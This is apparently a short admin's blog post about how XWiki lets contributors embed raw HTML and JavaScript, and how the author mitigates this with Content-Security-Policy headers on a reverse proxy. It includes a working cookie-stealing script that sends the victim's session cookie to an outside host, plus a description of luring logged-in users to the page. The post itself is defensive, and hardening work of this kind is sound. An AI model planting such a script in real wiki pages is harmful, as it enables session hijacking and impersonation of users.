xwiki – by default – allows contributors to embed arbitrary html, including javascript. it does not take much effort to include something like:
{{html}}
<script>
document.write("<img src='https://kudzia.eu/?"+document.cookie+"&"+ (new Date().getTime())+"' />");
</script>
{{/html}}
then you just need to lure your victim into visiting given wiki page while being logged – you’ll get a http request containing that person’s cookie that can be re-used to impersonate her or him.
it seems that disabling the html macro is not a good idea. Content Security Policy is the best bandied that i’ve found. i’ve modified the definition of reverse proxy i’m using in front of xwiki to include:
Header set Content-Security-Policy "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content " Header set X-Content-Security-Policy "sandbox default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content " Header set X-Webkit-CSP "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
and i feel somewhat better about myself – i can still use iframes showing content from some.server.with.trusted.content, injected javascript still works but it fails to communicate with not-trusted hosts. it probably can still be exploited but that’s better than nothing.
unfortunately this change makes LiveTables unusable under IE.